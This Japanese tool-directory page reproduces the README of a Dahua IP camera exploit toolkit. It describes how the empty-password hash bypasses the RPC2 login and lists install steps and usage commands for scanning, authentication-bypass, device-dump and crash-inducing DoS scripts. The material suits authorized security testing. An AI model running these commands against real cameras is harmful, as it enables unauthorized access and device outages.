Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
dahua-cve-research — Dahua IPカメラ CVE調査ツールキット (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
ツール/GitHubGitHub/umair-aziz025/dahua-cve-research
IoTセキュリティネットワークマッピング脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubumair-aziz025/dahua-cve-research

dahua-cve-research

Dahua IPカメラ CVE調査ツールキット (CVE-2021-33044/33045, CVE-2025-31700/31701)

リポジトリを見る
2164ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Dahua IP Camera CVE エクスプロイト ツール

⚠️ 開発中 — これらのスクリプトは公開されているCVEの詳細に基づいており、脆弱なデバイスに対するさらなるテストが必要です。

4つの深刻なDahua IPカメラの脆弱性に対する研究および概念実証スクリプト。


⚠️ 法的免責事項

root@kitploit:~
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

By using these tools, you agree that:
  1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
  2. You will NOT use these tools for illegal activities
  3. You accept full responsibility for your actions
  4. The authors are NOT liable for any misuse or damage

Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.

対象CVE

CVECVSSタイプステータス
CVE-2021-330449.8 CRITICAL認証バイパスCISA KEV (活発に悪用されている)
CVE-2021-330459.8 CRITICAL認証バイパスCISA KEV (活発に悪用されている)
CVE-2025-317008.1 HIGHバッファオーバーフロー DoS最近 (2025)
CVE-2025-317018.1 HIGHバッファオーバーフロー DoS最近 (2025)

CVE-2021-33044 & CVE-2021-33045 — 認証バイパス

  • CVSS: 9.8 CRITICAL
  • CWE: CWE-287 (不適切な認証)
  • メカニズム: RPC2ログインが空パスワードのハッシュを受け入れ、管理者アクセスを許可する
  • 影響を受ける製品: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • 修正バージョン: ファームウェア 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • 参考文献:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • CISA KEV Catalog

CVE-2025-31700 & CVE-2025-31701 — バッファオーバーフロー (DoS/RCE)

  • CVSS: 8.1 HIGH
  • CWE: CWE-120 (入力サイズのチェックなしでのバッファコピー)
  • メカニズム: 過大なパケットがバッファオーバーフローを引き起こし、クラッシュまたは潜在的なRCEに至る
  • 参考文献:
    • NVD CVE-2025-31700
    • Dahua Security Advisory

認証バイパスの仕組み

Dahuaカメラは /RPC2_Login を介したチャレンジレスポンス認証を使用します:

root@kitploit:~
Normal Login:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Bypass (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← 空パスワード
  step2 = MD5("step1:random:step1")

脆弱なファームウェアは空パスワードのハッシュを受け入れ、有効なセッショントークンを返します。


スクリプト


インストール

root@kitploit:~
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Install dependencies
pip install requests

使用方法

ネットワークスキャナー

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Single host with port
python dahua_scanner.py 192.168.1.100:8081

# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Show help
python dahua_scanner.py --help

一般的なDahuaポート: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

マルチCVEエクスプロイト (推奨)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Single CVE
python dahua_exploit.py --help

認証バイパス

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # バイパス後にデバイス情報をダンプ

バッファオーバーフロー DoS

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # HTTPのみ
python dahua_rce.py 192.168.1.100 --cve tcp   # TCP/37777のみ

⚠️ 警告: DoSスクリプトは対象デバイスをクラッシュさせる可能性があります。


依存関係

root@kitploit:~
requests

その他のインポートはすべてPython標準ライブラリからです: socket, struct, hashlib, threading, ipaddress, argparse, json


開発状況

🚧 活発に開発中

これらのスクリプトは以下に基づいて開発されています:

  • NVDからの公開CVE詳細
  • Dahuaセキュリティアドバイザリ
  • 公開PoCリファレンス (seclists.org, packetstormsecurity)

テスト状況:

  • ✅ 認証バイパスロジックをCVE仕様に基づいて実装
  • ✅ バッファオーバーフローペイロードをアドバイザリに従って構築
  • ⚠️ 動作中の脆弱なデバイスに対する限定的なテスト
  • ⚠️ 多様なファームウェアバージョンに対する追加検証が必要

テスト用の脆弱なデバイスにアクセスできる場合、コントリビューションやフィードバックを歓迎します。


コントリビューション

  1. リポジトリをフォークする
  2. 機能ブランチを作成する
  3. 変更をテストする
  4. プルリクエストを送信する

問題や誤検出があれば報告してください。


参考文献

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • CISA Known Exploited Vulnerabilities
  • Dahua Security Center
  • Bashis PoC - Seclists

ライセンス

MIT ライセンス - LICENSE ファイルを参照してください。


著者

Umair Aziz
GitHub: @umair-aziz025


教育および許可されたセキュリティ研究のみを目的としています。

ツールをダウンロード
ファイル目的CVE
dahua_scanner.pyネットワーク探索 — サブネット上のDahuaカメラを検出検出
dahua_exploit.pyマルチCVEスキャナー — すべての脆弱性をテストすべて
dahua_auth_bypass.py--dump オプション付きの専用認証バイパスCVE-2021-33044/45
dahua_rce.pyバッファオーバーフロー DoS プローブCVE-2025-31700/01